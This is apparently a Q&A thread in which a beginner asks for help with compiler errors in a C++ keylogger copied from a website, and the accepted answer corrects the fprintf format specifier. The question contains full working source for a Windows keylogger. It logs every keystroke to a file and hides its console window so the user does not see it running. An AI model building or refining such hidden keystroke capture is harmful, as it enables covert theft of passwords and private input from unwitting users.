# C4477: 'fprintf' : format string '%s' requires an argument of type 'char *', but variadic argument 1 has type 'int *'

Tags: c++, keylogger

Okay, so I have made a keylogger using a website (not linking it because it could be used for malicious purposes, not my purpose for a keylogger) so I can create a program for anti-scamming made with visual c++. I know fprintf is deprecated and if anyone can help me with changing it to fprintf_s I would really appreciate it because I am very new to c++ and struggle with it. This is going to be heavily modified to my liking and I would like to know what the reasons are for those two errors. Is it possible to make an array to hold the whole keystroke == 8 section?

```
#include "stdafx.h"
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>

int SaveLogs(char key_stroke, char *file);
void Stealth();

int main()
{
    Stealth();
    char i;

    while (1)
    {
        for (i = 8; i <= 190; i)
        {
            if (GetAsyncKeyState(i) == -32767)
                SaveLogs(i, "MYLOGS.txt");
        }
    }
    system("PAUSE");
    return 0;
}

int SaveLogs(int key_stroke, char *file)
{
    if ((key_stroke == 1) || (key_stroke == 2))
        return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a ");

    cout << key_stroke << endl;

    if (key_stroke == 8) 
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "n");
    else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
        fprintf(OUTPUT_FILE, "%s", ".");
    else
        fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose(OUTPUT_FILE);
    return 0;
}

void Stealth()
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth, 0);
}
```

and I get errors:

```
fopen may be unsafe consider using fopen_s instead...

fprintf format string '%s' requires an argument type of 'char *', but variadic argument 1 has type 'int *'
```

Is there any work around or fix to this?

So for example: 
The console would say:
"hi" because I have typed h i (or whatever the user types) and so it has detected it through the VK cases, and the output to the .txt would be "hi" as well instead of the virtual key codes

Thanks

Comment: `key_stroke` is an `int` use `"%d"` and don't pass its address

Comment: What do you want to print to file ? If you want key code , you need to use `%d` specifier.

Comment: @RichardCritten I did this and now get 'fprintf format string '%s' requires an argument type of 'int', but variadic argument 1 has type 'int *'' and pSolt sorry should have specified, I would like for it to literally type in what the host types so not "*virtualkeycodeforh**virtualkeycodefori* but "hi". Adding this to question.

Comment: Please [edit] your question to provide a [mcve].

Comment: From the portion of code you showed, I cannot see what`s wrong with the only `fprintf` inside, i.e. `fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");`. Is it really the code you compile? can you give us an example in which we can reproduce the error?

Comment: @StephanLechner hi that is all the code that I compile and the error only points to line 66 which is fprintf(OUTPUT_FILE, "%s", &key_stroke); pointing to %s

Comment: well, `&key_stroke` is of type `int *` and not `char *`, isn't it? You'd write `fprintf(OUTPUT_FILE, "%d", key_stroke);`

Answer (score 1, accepted):

The compiler says rather clearly what's wrong, if it points to the line with `fprintf(OUTPUT_FILE, "%s", &key_stroke);`:

It uses format specifier `"%s"` (requiring an argument of type `char *`), but `&key_stroke` is of type `int *` and not `char *`.

I'd suggest to write out the integral value in text format, i.e to write `fprintf(OUTPUT_FILE, "%d", key_stroke);`.

Comment: thank you stephan it worked now have to find a way to fix fopen is unsafe